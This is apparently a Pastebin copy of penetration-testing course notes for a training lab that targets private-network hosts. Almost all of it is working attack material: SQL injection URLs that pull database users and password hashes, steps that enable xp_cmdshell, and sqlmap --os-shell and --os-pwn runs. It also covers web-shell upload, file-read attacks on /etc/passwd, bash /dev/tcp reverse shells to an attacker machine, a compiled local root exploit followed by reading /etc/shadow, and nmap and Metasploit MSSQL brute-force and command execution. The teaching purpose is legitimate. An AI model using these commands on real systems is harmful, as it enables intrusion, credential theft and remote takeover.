Advertisement
joemccray

Web App Lab Norway

Sep 7th, 2016
1,396
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 17.54 KB | None | 0 0
  1. #################
  2. # SQL Injection #
  3. #################
  4.  
  5.  
  6. http://10.250.100.221/
  7. http://10.250.100.221/bookdetail.aspx?id=2
  8. http://10.250.100.221/bookdetail.aspx?id=2'
  9. http://10.250.100.221/bookdetail.aspx?id='
  10.  
  11.  
  12. http://10.250.100.221/bookdetail.aspx?id=(2)
  13. http://10.250.100.221/bookdetail.aspx?id=(4-2)
  14. http://10.250.100.221/bookdetail.aspx?id=(4-1)
  15.  
  16.  
  17.  
  18. http://10.250.100.221/bookdetail.aspx?id=2 or 1=1--
  19. http://10.250.100.221/bookdetail.aspx?id=2 or 1=2--
  20. http://10.250.100.221/bookdetail.aspx?id=1*1
  21. http://10.250.100.221/bookdetail.aspx?id=2 or 1 >-1#
  22. http://10.250.100.221/bookdetail.aspx?id=2 or 1<99#
  23. http://10.250.100.221/bookdetail.aspx?id=2 or 1<>1#
  24. http://10.250.100.221/bookdetail.aspx?id=2 or 2 != 3--
  25. http://10.250.100.221/bookdetail.aspx?id=2 &0#
  26.  
  27.  
  28.  
  29. http://10.250.100.221/bookdetail.aspx?id=2 or 1 in (SELECT DB_NAME(0))--
  30. http://10.250.100.221/bookdetail.aspx?id=2 or 1 in (SELECT DB_NAME(1))--
  31. http://10.250.100.221/bookdetail.aspx?id=2 or 1 in (SELECT DB_NAME(2))--
  32. http://10.250.100.221/bookdetail.aspx?id=2 or 1 in (SELECT DB_NAME(3))--
  33. http://10.250.100.221/bookdetail.aspx?id=2 or 1 in (SELECT DB_NAME(4))--
  34. http://10.250.100.221/bookdetail.aspx?id=2 or 1 in (SELECT DB_NAME(N))-- NOTE: "N" - just means to keep going until you run out of databases
  35. http://10.250.100.221/bookdetail.aspx?id=2 or 1 in (select top 1 name from sysobjects where xtype=char(85))--
  36. http://10.250.100.221/bookdetail.aspx?id=2 or 1 in (select top 1 name from sysobjects where xtype=char(85) and name>'bookmaster')--
  37. http://10.250.100.221/bookdetail.aspx?id=2 or 1 in (select top 1 name from sysobjects where xtype=char(85) and name>'sysdiagrams')--
  38. http://10.250.100.221/bookdetail.aspx?id=2 order by 100--
  39. http://10.250.100.221/bookdetail.aspx?id=2 order by 50--
  40. http://10.250.100.221/bookdetail.aspx?id=2 order by 25--
  41. http://10.250.100.221/bookdetail.aspx?id=2 order by 10--
  42. http://10.250.100.221/bookdetail.aspx?id=2 order by 5--
  43. http://10.250.100.221/bookdetail.aspx?id=2 order by 6--
  44. http://10.250.100.221/bookdetail.aspx?id=2 order by 7--
  45. http://10.250.100.221/bookdetail.aspx?id=2 order by 8--
  46. http://10.250.100.221/bookdetail.aspx?id=2 order by 9--
  47. http://10.250.100.221/bookdetail.aspx?id=2 union all select 1,2,3,4,5,6,7,8,9--
  48. http://10.250.100.221/bookdetail.aspx?id=-2 union all select 1,2,3,4,5,6,7,8,9--
  49. http://10.250.100.221/bookdetail.aspx?id=-2 union all select 1,user,@@version,4,5,6,7,8,9--
  50. http://10.250.100.221/bookdetail.aspx?id=-2 union all select 1,user,@@version,@@servername,5,6,7,8,9--
  51. http://10.250.100.221/bookdetail.aspx?id=-2 union all select 1,user,@@version,@@servername,5,6,db_name(0),8,9--
  52. http://10.250.100.221/bookdetail.aspx?id=-2 union all select 1,user,@@version,@@servername,5,6,master.sys.fn_varbintohexstr(password_hash),8,9 from master.sys.sql_logins--
  53.  
  54.  
  55.  
  56. ###############################
  57. # Blind SQL Injection Testing #
  58. ###############################
  59. Time-Based BLIND SQL INJECTION - EXTRACT DATABASE USER
  60.  
  61. 3 - Total Characters
  62. http://10.250.100.221/bookdetail.aspx?id=2; IF (LEN(USER)=1) WAITFOR DELAY '00:00:10'--
  63. http://10.250.100.221/bookdetail.aspx?id=2; IF (LEN(USER)=2) WAITFOR DELAY '00:00:10'--
  64. http://10.250.100.221/bookdetail.aspx?id=2; IF (LEN(USER)=3) WAITFOR DELAY '00:00:10'-- (+10 seconds)
  65.  
  66. D - 1st Character
  67. http://10.250.100.221/bookdetail.aspx?id=2; IF (ASCII(lower(substring((USER),1,1)))=97) WAITFOR DELAY '00:00:10'-- (+10 seconds)
  68. http://10.250.100.221/bookdetail.aspx?id=2; IF (ASCII(lower(substring((USER),1,1)))=98) WAITFOR DELAY '00:00:10'--
  69. http://10.250.100.221/bookdetail.aspx?id=2; IF (ASCII(lower(substring((USER),1,1)))=99) WAITFOR DELAY '00:00:10'--
  70. http://10.250.100.221/bookdetail.aspx?id=2; IF (ASCII(lower(substring((USER),1,1)))=100) WAITFOR DELAY '00:00:10'-- (+10 seconds)
  71.  
  72. B - 2nd Character
  73. http://10.250.100.221/bookdetail.aspx?id=2; IF (ASCII(lower(substring((USER),2,1)))>97) WAITFOR DELAY '00:00:10'-- (+10 seconds)
  74. http://10.250.100.221/bookdetail.aspx?id=2; IF (ASCII(lower(substring((USER),2,1)))=98) WAITFOR DELAY '00:00:10'-- (+10 seconds)
  75.  
  76. O - 3rd Character
  77. http://10.250.100.221/bookdetail.aspx?id=2; IF (ASCII(lower(substring((USER),3,1)))>97) WAITFOR DELAY '00:00:10'-- (+10 seconds)
  78. http://10.250.100.221/bookdetail.aspx?id=2; IF (ASCII(lower(substring((USER),3,1)))>115) WAITFOR DELAY '00:00:10'--
  79. http://10.250.100.221/bookdetail.aspx?id=2; IF (ASCII(lower(substring((USER),3,1)))>105) WAITFOR DELAY '00:00:10'-- (+10 seconds)
  80. http://10.250.100.221/bookdetail.aspx?id=2; IF (ASCII(lower(substring((USER),3,1)))>110) WAITFOR DELAY '00:00:10'-- (+10 seconds)
  81. http://10.250.100.221/bookdetail.aspx?id=2; IF (ASCII(lower(substring((USER),3,1)))=109) WAITFOR DELAY '00:00:10'--
  82. http://10.250.100.221/bookdetail.aspx?id=2; IF (ASCII(lower(substring((USER),3,1)))=110) WAITFOR DELAY '00:00:10'-- (+10 seconds)
  83.  
  84.  
  85.  
  86. ##########
  87. # Sqlmap #
  88. ##########
  89. cd /home/strategicsec/toolz/sqlmap-dev/
  90. python sqlmap.py -u "http://10.250.100.221/bookdetail.aspx?id=2" -b
  91. python sqlmap.py -u "http://10.250.100.221/bookdetail.aspx?id=2" --current-user
  92. python sqlmap.py -u "http://10.250.100.221/bookdetail.aspx?id=2" --current-db
  93. python sqlmap.py -u "http://10.250.100.221/bookdetail.aspx?id=2" --dbs
  94. python sqlmap.py -u "http://10.250.100.221/bookdetail.aspx?id=2" -D BookApp --tables
  95. python sqlmap.py -u "http://10.250.100.221/bookdetail.aspx?id=2" -D BookApp -T BOOKMASTER --columns
  96. python sqlmap.py -u "http://10.250.100.221/bookdetail.aspx?id=2" -D BookApp -T sysdiagrams --columns
  97. python sqlmap.py -u "http://10.250.100.221/bookdetail.aspx?id=2" -D BookApp -T BOOKMASTER --columns --dump
  98. python sqlmap.py -u "http://10.250.100.221/bookdetail.aspx?id=2" -D BookApp -T sysdiagrams --columns --dump
  99. python sqlmap.py -u "http://10.250.100.221/bookdetail.aspx?id=2" --users --passwords
  100.  
  101.  
  102.  
  103.  
  104.  
  105. Enabling XP-Command Shell (in your web browswer type the following URL)
  106. http://10.250.100.221/bookdetail.aspx?id=2;exec master..sp_configure 'show advanced options',1;reconfigure;exec master..sp_configure 'xp_cmdshell',1;reconfigure--
  107.  
  108. ############################################## ##############################################
  109. # Executing System Commands With xp_cmdshell #
  110. ##############################################
  111.  
  112. Go to the address below in firefox:
  113. http://10.250.100.221/bookdetail.aspx?id=2;exec+master..xp_cmdshell+'ping -n 8 127.0.0.1'--
  114.  
  115.  
  116. Go to the address below in firefox:
  117. http://10.250.100.221/bookdetail.aspx?id=2;exec+master..xp_cmdshell+'dir+>+c:\inetpub\wwwroot\dir_yourname-was-here.txt'--
  118.  
  119.  
  120.  
  121. Check it
  122. --------
  123. http://10.250.100.221/dir_yourname-was-here.txt
  124.  
  125.  
  126.  
  127.  
  128. Go to the address below in firefox:
  129. http://10.250.100.221/bookdetail.aspx?id=2;exec+master..xp_cmdshell+'ipconfig+>+c:\inetpub\wwwroot\ipconfig_yourname-was-here.txt'--
  130.  
  131.  
  132.  
  133. Check it
  134. --------
  135. http://10.250.100.221/ipconfig_yourname-was-here.txt
  136.  
  137.  
  138.  
  139.  
  140. Go to the address below in firefox:
  141. http://10.250.100.221/bookdetail.aspx?id=2;exec+master..xp_cmdshell+'netstat+>+c:\inetpub\wwwroot\netstat_yourname-was-here.txt'--
  142.  
  143.  
  144.  
  145.  
  146.  
  147. Check it
  148. --------
  149. http://10.250.100.221/netstat_yourname-was-here.txt
  150.  
  151.  
  152.  
  153. -----------------Some Manual Testing-----------------
  154.  
  155. Go to LAMP Target homepage
  156. http://10.250.100.115/
  157.  
  158. - Ask yourself the 3 web questions
  159.  
  160. 1. Does the website talk to a DB?
  161. - Look for parameter passing (ex: site.com/page.php?id=4)
  162. - If yes - try SQL Injection
  163.  
  164. 2. Can I or someone else see what I type?
  165.  
  166. 3. Does the page reference a file?
  167.  
  168.  
  169.  
  170.  
  171. Clicking on the Acer Link:
  172. http://10.250.100.115/acre2.php?lap=acer
  173.  
  174. - Found parameter passing (answer yes to question 1)
  175. - Insert ' to test for SQLI
  176.  
  177. http://10.250.100.115/acre2.php?lap=acer'
  178.  
  179.  
  180. Page returns the following error:
  181. You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''acer''' at line 1
  182.  
  183.  
  184.  
  185. In order to perform union-based sql injection - we must first determine the number of columns in this query.
  186. We do this using the ORDER BY
  187. http://10.250.100.115/acre2.php?lap=acer' order by 100-- +
  188.  
  189. Page returns the following error:
  190. Unknown column '100' in 'order clause'
  191.  
  192.  
  193.  
  194. http://10.250.100.115/acre2.php?lap=acer' order by 50-- +
  195.  
  196.  
  197.  
  198. Now we negate the parameter value 'acer' by turning into the word 'null':
  199. http://10.250.100.115/acre2.php?lap=null' union all select 1,2,3,4,5,6-- j
  200.  
  201. We see that a 4 and a 5 are on the screen. These are the columns that will echo back data
  202.  
  203.  
  204.  
  205.  
  206. Use a cheat sheet for syntax:
  207. http://pentestmonkey.net/cheat-sheet/sql-injection/mysql-sql-injection-cheat-sheet
  208.  
  209.  
  210.  
  211. http://10.250.100.115/acre2.php?lap=null' union all select 1,2,3,user(),version(),6-- j
  212.  
  213.  
  214.  
  215. http://10.250.100.115/acre2.php?lap=null' union all select 1,2,3,user(),5,6-- j
  216.  
  217. Page returns the following error:
  218. Unknown column '50' in 'order clause'
  219.  
  220.  
  221.  
  222.  
  223.  
  224. http://10.250.100.115/acre2.php?lap=acer' order by 25-- +
  225. Page returns the following error:
  226. Unknown column '25' in 'order clause'
  227.  
  228.  
  229.  
  230. http://10.250.100.115/acre2.php?lap=acer' order by 5-- +
  231. ---Valid page returned for 5 and 6...error on 7 so we know there are 6 columns
  232.  
  233.  
  234.  
  235. Now we build out the union all select statement with the correct number of columns
  236.  
  237. Reference:
  238. http://www.techonthenet.com/sql/union.php
  239.  
  240.  
  241.  
  242. http://10.250.100.115/acre2.php?lap=acer' union all select 1,2,3,4,5,6-- +
  243.  
  244.  
  245.  
  246.  
  247.  
  248. http://10.250.100.115/acre2.php?lap=acer' union all select 1,2,3,user,password,6 from mysql.user -- a
  249.  
  250.  
  251.  
  252.  
  253.  
  254.  
  255.  
  256. Here we see that do not have parameter passing, but we can see what we type.
  257. http://10.250.100.115/career.php
  258.  
  259. Tried XSS, but that didn't - then noticed that we can upload a file.
  260.  
  261. Go to http://www.open-labs.org/
  262.  
  263. Download yourname_webkit
  264.  
  265. http://www.open-labs.org/yourname_webkit02.tar.gz
  266.  
  267. Upload cmd.php or list.php...now you have find it!!!!! Where is it????
  268.  
  269.  
  270. Tried a bunch of dirs - finally found it in /resume:
  271. http://10.250.100.115/resume/cmd.php
  272.  
  273. Try the following commands:
  274. /sbin/ifconfig
  275.  
  276. uname -a
  277.  
  278. id
  279.  
  280. cat /etc/passwd
  281.  
  282.  
  283.  
  284.  
  285.  
  286. Here we see parameter passing, but this one is actually a yes to question number 3 (reference a file)
  287. http://10.250.100.115/showfile.php?filename=about.txt
  288.  
  289.  
  290.  
  291. See if you can read files on the file system:
  292. http://10.250.100.115/showfile.php?filename=/etc/passwd
  293.  
  294.  
  295.  
  296.  
  297. -----------------Some Automated Testing-----------------
  298.  
  299. cd /home/strategicsec/toolz/sqlmap-dev/
  300.  
  301. python sqlmap.py -u "http://10.250.100.115/acre2.php?lap=acer" -b -v 3
  302.  
  303.  
  304. python sqlmap.py -u "http://10.250.100.115/acre2.php?lap=acer" --current-user -v 3
  305.  
  306.  
  307. python sqlmap.py -u "http://10.250.100.115/acre2.php?lap=acer" --current-db -v 3
  308.  
  309.  
  310. python sqlmap.py -u "http://10.250.100.115/acre2.php?lap=acer" --privileges -v 3
  311.  
  312.  
  313. python sqlmap.py -u "http://10.250.100.115/acre2.php?lap=acer" --dbs -v 3
  314.  
  315.  
  316. python sqlmap.py -u "http://10.250.100.115/acre2.php?lap=acer" --tables -v 3
  317.  
  318.  
  319. python sqlmap.py -u "http://10.250.100.115/acre2.php?lap=acer" --file-read=/etc/issue -v 3
  320.  
  321.  
  322. python sqlmap.py -u "http://10.250.100.115/acre2.php?lap=acer" --file-read=/etc/passwd -v 3
  323.  
  324.  
  325.  
  326. python sqlmap.py -u "http://10.250.100.115/acre2.php?lap=acer" --os-shell -v 3
  327. 3
  328. /var/www/html/
  329. /var/www/html/uploads/
  330.  
  331.  
  332. id
  333. Y
  334.  
  335. ls -lsa
  336. Y
  337.  
  338. uname -a
  339. Y
  340.  
  341.  
  342.  
  343.  
  344.  
  345. python sqlmap.py -u "http://10.250.100.115/acre2.php?lap=acer" --os-pwn --msf-path=/home/strategicsec/toolz/metasploit/ -v 3
  346. 3
  347. /var/www/html/
  348. /var/www/html/uploads/
  349. /sbin/ifconfig
  350. Y
  351.  
  352.  
  353.  
  354.  
  355. -----------------Some homework-----------------
  356.  
  357. 1. Do all of the labs in the https://s3.amazonaws.com/StrategicSec-Files/LAMP-WebAppLabs.pdf document
  358.  
  359.  
  360. -----------------Challenge-----------------
  361. 1. Root this box!
  362.  
  363. Send me a word document with screenshots proving that you did all of the exercises.
  364.  
  365.  
  366.  
  367.  
  368.  
  369. ###################################
  370. # Root Method 1: Find Credentials #
  371. ###################################
  372.  
  373. http://10.250.100.115/resume/cmd.php
  374.  
  375. ls -lsa
  376.  
  377. ls -lsa /var/www/html/
  378.  
  379.  
  380. Find a file called dbconnect.php
  381.  
  382. cat /var/www/html/dbconnect.php
  383.  
  384. or
  385.  
  386. http://10.250.100.115/showfile.php?filename=dbconnect.php
  387.  
  388.  
  389.  
  390. ssh into host with the credentials you find
  391. (note: This is a shot in the dark. The mysql root user pass is not always the same as the real root pass.)
  392.  
  393.  
  394.  
  395.  
  396. #######################################
  397. # Root Method 2: Privilege Escalation #
  398. #######################################
  399.  
  400. start listener on your machine
  401. ncat -l -v -p 1234
  402.  
  403.  
  404.  
  405. Go back to uploaded webshell
  406. http://10.250.100.115/resume/cmd.php
  407.  
  408.  
  409.  
  410.  
  411. bash -i >& /dev/tcp/StrategicSec-Ubuntu-VM-Bridged-IP/1234 0>&1
  412.  
  413.  
  414. id
  415. uname -a
  416. pwd
  417.  
  418.  
  419.  
  420.  
  421. cd /tmp
  422.  
  423.  
  424.  
  425. cat >> yourname.c << out <-------------- paste in the exploit code text from the exploit-db.com link below
  426.  
  427.  
  428.  
  429.  
  430. http://www.exploit-db.com/exploits/9479/
  431.  
  432.  
  433.  
  434. gcc -o yourname yourname.c
  435.  
  436.  
  437. ./yourname
  438.  
  439.  
  440. id
  441.  
  442. cat /etc/shadow
  443.  
  444.  
  445. #########################################
  446. # Simple Linux Post Exploitation Tricks #
  447. #########################################
  448.  
  449.  
  450.  
  451.  
  452. Linux Lab 1:
  453. ------------
  454. On your Windows host type this:
  455.  
  456. ncat -l -vv -p 4321 > see.txt
  457.  
  458.  
  459. On your Linux host type this:
  460.  
  461. echo "see this" > /dev/tcp/StrategicSec-Ubuntu-VM-Bridged-IP/4321
  462.  
  463.  
  464.  
  465.  
  466.  
  467. Linux Lab 2:
  468. ------------
  469. On your Windows host type this:
  470.  
  471. ncat -l -vv -p 1234
  472.  
  473.  
  474.  
  475. On your Linux host type this:
  476. /bin/bash -i > /dev/tcp/StrategicSec-Ubuntu-VM-Bridged-IP/1234 0<&1 2>&1
  477.  
  478.  
  479.  
  480.  
  481.  
  482.  
  483. Linux Lab 3:
  484. ------------
  485.  
  486. port=1; while [ $port -lt 1024 ]; do echo > /dev/tcp/10.250.100.221/$port; [ $? == 0 ] && echo $port "is open" >> /tmp/ports.txt; port=`expr $port + 1`; done
  487.  
  488.  
  489. cat /tmp/ports.txt
  490.  
  491.  
  492.  
  493.  
  494.  
  495. Linux Lab 3a:
  496. -------------
  497.  
  498. for ((i=0; $i < 1024; i++));
  499. do echo >/dev/tcp/10.250.100.221/$i && echo $i open;
  500. done 2>/dev/null
  501.  
  502.  
  503.  
  504. Linux Lab 3b:
  505. -------------
  506.  
  507. for p in {1..1023}
  508. do
  509. (echo >/dev/tcp/10.250.100.221/$p) >/dev/null 2>&1 && echo "$p open"
  510. done
  511.  
  512.  
  513.  
  514.  
  515.  
  516.  
  517. Lab 4:
  518. ------
  519. On your Windows host type this:
  520. ncat -l -vv -p 31337 (command shell window 1)
  521. ncat -l -vv -p 1337 (command shell window 2)
  522.  
  523.  
  524. On your Linux host type this:
  525. telnet StrategicSec-Ubuntu-VM-Bridged-IP 31337 | /bin/bash | telnet StrategicSec-Ubuntu-VM-Bridged-IP 1337
  526.  
  527.  
  528.  
  529.  
  530.  
  531.  
  532.  
  533.  
  534.  
  535. Type commands on the 31337 listener, and see the output on the 1337 listener
  536.  
  537.  
  538.  
  539.  
  540.  
  541. ----------------------------------------------------------------------------------
  542. Lab 3a: Identifying MSSQL Server
  543.  
  544. propecia 10.250.100 1433
  545.  
  546. Lab 3b: Determine the Version
  547. nmap -sV -p 1433 10.250.100.221
  548. nmap -sV -p 1433 --script=ms-sql-info 10.250.100.221
  549.  
  550.  
  551. Lab 3c: Bruteforcing MSSQL
  552. nmap -sV -p 1433 --script=ms-sql-brute --script-args userdb=customuser.txt,passdb=custompass.txt 10.250.100.221
  553. nmap –p 1433 –script ms-sql-brute 10.250.100.221
  554. Neither one of these would work.
  555.  
  556.  
  557. Lab 3d: Extracting Data From MSSQL
  558. nmap -sV -p 1433 --script ms-sql-tables --script-args mssql.username=sa,mssql.password=database 10.250.100.221
  559.  
  560. nmap -sV -p 1433 10.250.100.1-254
  561.  
  562. MSSQL
  563. ---------
  564. propecia 10.10.10 1433
  565. ./sqlcmd 10.250.100.221:1433
  566.  
  567. NMAP
  568. nmap -p1433 --script ms-sql-info 10.250.100.221
  569. nmap -p1433 --script ms-sql-empty-password 10.250.100.221
  570. nmap -p1433 --script ms-sql-brute 10.250.100.221
  571. nmap -p1433 --script --script-args userdb=users.txt,passdb=pass.txt 10.250.100.221
  572. nmap -p1433 --script ms-sql-hasdbaccess.nse --script-args mssql.username=sa 10.250.100.221
  573. nmap -p1433 --script ms-sql-tables --script-args mssql.username=sa 10.250.100.221
  574. nmap -p1433 --script ms-sql-xp-cmdshell --script-args mssql.username=sa 10.250.100.221
  575. nmap -p1433 --script ms-sql-xp-cmdshell --script-args=ms-sql-xp-cmdshell.cmd=’net users’,mssql.username=sa 10.250.100.221
  576. nmap -p1433 --script ms-sql-dump-hashes --script-args mssql.username=sa 10.250.100.221
  577.  
  578.  
  579.  
  580.  
  581.  
  582. Lab 3e: Attacking MSSQL Server With Metasploit
  583.  
  584. cd ~/toolz/metasploit
  585.  
  586. ./msfconsole
  587.  
  588. use auxiliary/admin/mssql/mssql_sql
  589.  
  590. show options
  591.  
  592. set RHOST 10.250.100.221
  593.  
  594. set username sa
  595.  
  596. set password database
  597.  
  598. exploit
  599.  
  600.  
  601.  
  602.  
  603.  
  604.  
  605.  
  606.  
  607.  
  608. use auxiliary/admin/mssql/mssql_enum
  609.  
  610. show options
  611.  
  612. set RHOST 10.250.100.221
  613.  
  614. set username sa
  615.  
  616. set password database
  617.  
  618. exploit
  619.  
  620.  
  621.  
  622.  
  623.  
  624. use auxiliary/admin/mssql/mssql_exec
  625.  
  626. show options
  627.  
  628. set RHOST 10.250.100.221
  629.  
  630. set password database
  631.  
  632. set CMD cmd.exe /c ping localhost
  633.  
  634. exploit
  635.  
  636.  
  637.  
  638.  
  639.  
  640. use auxiliary/scanner/mssql/mssql_ping
  641. set RHOSTS 10.250.100.221
  642. run
  643.  
  644. use auxiliary/admin/mssql/mssql_enum
  645. set RHOSTS 10.250.100.221
  646. run
  647.  
  648. set CMD ‘ipconfig’
  649. run
  650.  
  651.  
  652.  
  653.  
  654.  
  655. MS-SQL
  656. nmap -sV -p 1433 --script=ms-sql-info 10.250.100.221
  657.  
  658. nmap -sV -p 1433 --script=ms-sql-brute --script-args userdb=userlist.txt,passdb=passwordlist.txt 10.250.100.221
  659.  
  660. nmap -sV -p 1433 --script ms-sql-tables --script-args mssql.username=sa,mssql.password=database 10.250.100.221
  661.  
  662.  
  663.  
  664. MySQL
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement